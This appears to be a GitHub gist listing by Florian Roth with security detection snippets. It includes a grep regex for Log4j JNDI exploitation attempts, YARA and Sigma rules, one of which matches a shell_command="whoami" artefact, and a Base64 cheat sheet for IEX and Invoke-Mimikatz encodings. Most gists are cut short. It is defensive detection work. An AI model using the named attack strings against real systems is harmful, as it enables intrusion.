References: https://twitter.com/cyb3rops/status/1499514240008437762 https://twitter.com/GossiTheDog/status/1499781976835993600
More background: https://twitter.com/FuzzySec/status/1499462430275084307
Florian Roth Neo23x0
Neo23x0
/ log4j_rce_detection.md
Last active
October 4, 2025 08:06
Log4j RCE CVE-2021-44228 Exploitation Detection
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
Neo23x0
/ minecraft-seus-shader.md
Last active
December 11, 2021 11:15
Minecraft with SEUS Shader - Guide
Guide by Florian Roth
https://www.minecraft.net/en-us/store/minecraft-java-edition/
I've transformed this gist into a git repository.
Whenever you research a certain vulnerability ask yourself these questions and please answer them for us
Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)
Neo23x0
/ snippet_gen_yara_hash.py
Created
October 10, 2020 15:51
YARA Rule Hash Used by Nextron Systems
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| import re | |
| def calculate_rule_hash(rule): | |
| """ | |
| Calculates a hash over the relevant YARA rule content (string contents, sorted condition) | |
| Requires a YARA rule object as generated by 'plyara': https://github.com/plyara/plyara | |
| :param rule: yara rule object | |
| :return hash: generated hash | |
| """ |
Neo23x0
/ get-casing.py
Created
July 2, 2020 14:18
Get All Possible Variations of Casings for a String
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import itertools | |
| s = "cmd.exe" | |
| list(map(''.join, itertools.product(*zip(s.upper(), s.lower())))) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule SUSP_Netscaler_Forensic_Artefacts { | |
| meta: | |
| description = "Detects strings / forensic artefacts on exploited Netscaler systems" | |
| author = "Florian Roth" | |
| reference = "https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/" | |
| date = "2020-01-14" | |
| score = 70 | |
| strings: | |
| $ = "shell_command=\"whoami\"" ascii |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ################################################################################ | |
| # IMPORTANT NOTE | |
| # The most recent version of this POC rule can now be found in the main repository | |
| # https://github.com/Neo23x0/sigma/blob/master/other/godmode_sigma_rule.yml | |
| # ################################################################################ | |
| # _____ __ __ ___ __ | |
| # / ___/__ ___/ / / |/ /__ ___/ /__ | |
| # / (_ / _ \/ _ / / /|_/ / _ \/ _ / -_) | |
| # \___/\___/\_,_/ /_/ /_/\___/\_,_/\__/_ | |
| # / __(_)__ ___ _ ___ _ / _ \__ __/ /__ |
Neo23x0
/ Base64_CheatSheet.md
Last active
December 1, 2025 19:51
Learning Aid - Top Base64 Encodings Table
| Base64 Code | Mnemonic Aid | Decoded* | Description |
|---|---|---|---|
JAB |
π£ Jabber | $. |
Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
TVq |
πΊ Television | MZ |
MZ header |
SUVY |
π SUV | IEX |
PowerShell Invoke Expression |
SQBFAF |
π£ Squab favorite | I.E. |
PowerShell Invoke Expression (UTF-16) |
SQBuAH |
π£ Squab uahhh | I.n. |
PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz |
PAA |
πͺ "Pah!" | <. |
Often used by Emotet (UTF-16) |
Neo23x0
/ sysmon_suspicious_keyboard_layout_load.yml
Last active
September 4, 2020 15:41
Sigma Rule to Detect Uncommon Keyboard Layout Loads in Your Organisation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| title: Suspicious Keyboard Layout Load | |
| description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only | |
| references: | |
| - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index | |
| author: Florian Roth | |
| date: 2019/10/12 | |
| logsource: | |
| product: windows | |
| service: sysmon | |
| definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files' |